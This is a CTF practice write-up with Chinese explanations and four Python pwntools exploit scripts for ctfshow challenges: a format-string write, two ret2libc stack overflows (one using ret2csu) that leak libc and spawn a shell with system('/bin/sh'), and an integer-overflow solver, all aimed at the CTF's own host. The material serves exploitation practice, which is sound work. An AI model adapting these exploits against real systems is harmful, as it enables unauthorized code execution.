PWN-PRACTICE-CTFSHOW-3


    • pwn10
    • 萌新赛-签到题
    • 萌新赛-数学99
    • 内部赛-签到题

pwn10

格式化字符串漏洞：输入被直接传给 printf。payload 先放 num 的地址（4 字节），再补 12 字节填充，使 `%7$hhn` 执行时已输出字符数恰为 16，于是把 16 以单字节写入 num，即可打印出 flag。偏移 7 是本题输入缓冲区在栈上的位置，换了二进制需用 `%7$p` 重新确认。

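# -*- coding:utf-8 -*-
"""pwn10: single-byte format-string write.

The input is handed to printf unfiltered, so a `%n`-family specifier
can write to an arbitrary address.  Layout of the payload:

    p32(num_addr)  4 bytes  -> the write target, also fills stack slot 7
    b"8" * 12      12 bytes -> padding so 16 chars have been printed
    b"%7$hhn"               -> store the low byte of the count (16) at num

`num_addr` is a fixed address, so the binary must be non-PIE.  The
argument offset (7) was found for this binary; re-check it with `%7$p`
if the target is rebuilt.  All payload pieces are bytes so the script
runs on Python 3 pwntools as well (str + bytes raises TypeError there).
"""
from pwn import *

context.log_level = "debug"
# io = process("./pwn1")
io = remote("pwn.challenge.ctf.show", 28045)
elf = ELF("./pwn1")

# gdb.attach(io, "b * 0x080485D0")
# pause()

num_addr = 0x0804A030  # address of the global `num` checked by the binary

io.recvuntil(b"try pwn me?")
# 4 (address) + 12 (padding) == 16 characters printed before %hhn fires.
payload = p32(num_addr) + b"8" * 12 + b"%7$hhn"
io.sendline(payload)

# pause()

io.interactive()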

萌新赛-签到题

栈溢出，ret2libc：第一次溢出用 `pop rdi; ret` + `puts@plt` 打印 puts@got 泄露 libc 地址并返回 main；第二次溢出据此计算 system 与 "/bin/sh" 地址拿 shell。脚本中的 libc 偏移是针对远程 libc 硬编码的，靶机换 libc 后需用 libc-database 等重新查。

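# -*- coding:utf-8 -*-
"""萌新赛-签到题: stack overflow -> ret2libc (x86-64, fixed addresses).

Stage 1: overwrite the 0x70-byte buffer and the saved rbp, then run
`pop rdi; ret` / `puts@plt` with rdi = &puts@got so the program prints
the resolved address of puts, and return to main for a second round.

Stage 2: libc base = leaked puts - offset(puts); call system("/bin/sh")
through `pop rdi; ret`, with an extra `ret` in front of system so rsp
stays 16-byte aligned (glibc's system() uses SSE moves that fault on a
misaligned stack).

The three libc offsets are hard-coded for the libc on the remote host;
re-derive them (e.g. with libc-database) if the challenge is redeployed.
Payload pieces are bytes so the script also runs on Python 3 pwntools.
"""
from pwn import *

context.log_level = "debug"
# io = process("./pwn1")
io = remote("pwn.challenge.ctf.show", 28018)
elf = ELF("./pwn1")

puts_got = elf.got["puts"]
puts_plt = elf.plt["puts"]
main_addr = 0x400687
pop_rdi = 0x400793  # pop rdi ; ret
ret = 0x40053e      # lone ret, used only for stack alignment

BUF_TO_RET = b"a" * 0x70 + b"b" * 8  # buffer + saved rbp, up to the return address

# --- stage 1: leak puts ---------------------------------------------------
io.recvuntil(b"successful!\n")
payload = BUF_TO_RET
payload += p64(pop_rdi) + p64(puts_got)  # rdi = &puts@got
payload += p64(puts_plt)                 # puts(rdi): prints the GOT entry
payload += p64(main_addr)                # back to main for stage 2
io.sendline(payload)

# puts stops at the first NUL byte of the pointer; a userland libc
# address is 6 significant bytes ending in 0x7f, so cut there and
# zero-extend to 8 bytes before unpacking.
leak = io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")
puts_addr = u64(leak)
print("puts_addr==" + hex(puts_addr))

libc_base = puts_addr - 0x0809c0
system = libc_base + 0x04f440
binsh = libc_base + 0x1b3e9a

# --- stage 2: system("/bin/sh") -------------------------------------------
io.recvuntil(b"successful!\n")
payload = BUF_TO_RET
payload += p64(pop_rdi) + p64(binsh)  # rdi = "/bin/sh"
payload += p64(ret)                   # realign rsp before the call
payload += p64(system)
payload += p64(main_addr)             # harmless return target after system
io.sendline(payload)

io.interactive()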

萌新赛-数学99

整型溢出：三组输入都让 32 位有符号运算回绕，例如 9629 × 446045 = 2^32 + 9，截断为 32 位后结果是 9；2147483658 + 2147483649 = 2^32 + 11，截断后是 11；最后一组是 INT_MIN 与 -1 的经典组合。具体校验逻辑以二进制反汇编为准。

# -*- coding:utf-8 -*-
"""萌新赛-数学99: integer-overflow rounds.

Three (a, b) pairs are sent in order.  Each pair is chosen so that the
32-bit signed arithmetic in the binary wraps:

    2147483658 + 2147483649 == 2**32 + 11  -> wraps to 11
    9629 * 446045           == 2**32 + 9   -> wraps to 9
    2147483648, -1          -> INT_MIN (as int32) paired with -1

What the binary compares the wrapped result against is not visible
here; confirm in the disassembly before reusing these numbers against
a rebuilt target.
"""
from pwn import *

context.log_level = "debug"
# io = process("./pwn1")
io = remote("pwn.challenge.ctf.show", 28171)
elf = ELF("./pwn1")

ROUNDS = [
    (2147483658, 2147483649),
    (9629, 446045),
    (2147483648, -1),
]

for a, b in ROUNDS:
    io.sendlineafter("a:", str(a))
    io.sendlineafter("b:", str(b))

io.interactive()

内部赛-签到题

栈溢出，ret2csu：二进制没有现成的 `pop rsi` / `pop rdx`，先借 `__libc_csu_init` 末尾的万能 gadget 调用 write(1, write@got, 8) 泄露 libc，再返回 main，第二次溢出用 `pop rdi; ret` 调 system("/bin/sh")。libc 偏移同样是针对远程 libc 硬编码的。

# -*- coding:utf-8 -*-
"""内部赛-签到题: stack overflow -> ret2csu leak, then ret2libc.

Setup: connect, load the local copy of the binary for GOT/PLT symbols,
and record the fixed (non-PIE) addresses used by both stages.
"""
from pwn import *

context.log_level = "debug"
# io = process("./pwn1")
io = remote("pwn.challenge.ctf.show", 28116)
elf = ELF("./pwn1")

write_got = elf.got["write"]
write_plt = elf.plt["write"]
main_addr = 0x4005FD

# Tail of __libc_csu_init: gadget_2 loads the call arguments from
# r13/r14/r15 and does `call [r12 + rbx*8]`; gadget_1 is the
# `pop rbx .. pop r15 ; ret` sequence that sets those registers.
gadget_2 = 0x4006A0
gadget_1 = 0x4006BA
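def com_gadget(rbx, rbp, r12, r13, r14, r15, main_addr):
	"""Build a ret2csu payload that calls [r12 + rbx*8] once and returns to main_addr.

	Stack layout produced (after the 160-byte buffer + saved rbp):
	    gadget_1                   pop rbx, rbp, r12, r13, r14, r15 ; ret
	    rbx, rbp, r12, r13, r14, r15
	    gadget_2                   set up args, call [r12+rbx*8], then
	                               add rbx,1 ; cmp rbx,rbp ; jne ...
	    56 bytes of filler         consumed by `add rsp,8` + the 6 pops
	                               that gadget_2 falls through to
	    main_addr                  final `ret`

	Callers pass rbx=0 and rbp=1 so the `cmp rbx, rbp` after the call
	is equal and execution falls through to the pops instead of looping.
	Which of r13/r14/r15 land in rdi/rsi/rdx depends on the glibc
	version the binary was linked against; the call site in this file
	assumes the older layout (r15d -> edi, r14 -> rsi, r13 -> rdx), so
	check the disassembly of gadget_2 before reusing this elsewhere.

	All pieces are bytes so the payload is valid on Python 3 pwntools
	(str + bytes would raise TypeError).
	"""
	payload = b"a" * (160 + 8)  # buffer + saved rbp
	payload += p64(gadget_1)
	payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)
	payload += p64(gadget_2)
	payload += b"a" * 56  # add rsp,8 + 6 pops after the call
	payload += p64(main_addr)
	return payload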

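# --- stage 1: leak write@got via the csu gadget ----------------------------
io.recvuntil(b"Try Pwn Me?\n")
# With this binary's csu layout the call becomes write(1, &write@got, 8):
# r12 = &write@got is what gets called, r15 = 1 (fd), r14 = &write@got
# (buf), r13 = 8 (count).  rbx = 0 / rbp = 1 stop the gadget from looping.
payload = com_gadget(0, 1, write_got, 8, write_got, 1, main_addr)
io.sendline(payload)

# write() emits the raw 8-byte pointer; keep the 6 significant bytes
# ending in 0x7f and zero-extend before unpacking.
leak = io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")
write_addr = u64(leak)
print("write_addr==" + hex(write_addr))

# Offsets hard-coded for the remote libc; re-derive if the target changes.
libc_base = write_addr - 0x110140
system = libc_base + 0x04f440
binsh = libc_base + 0x1b3e9a

# --- stage 2: system("/bin/sh") -------------------------------------------
pop_rdi = 0x4006c3  # pop rdi ; ret (inside the csu pop sequence)
ret = 0x4004a9      # lone ret, keeps rsp 16-byte aligned at the system() call
io.recvuntil(b"Try Pwn Me?\n")
payload = b"a" * (160 + 8)
payload += p64(pop_rdi) + p64(binsh)
payload += p64(ret)
payload += p64(system)
io.sendline(payload)

io.interactive()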
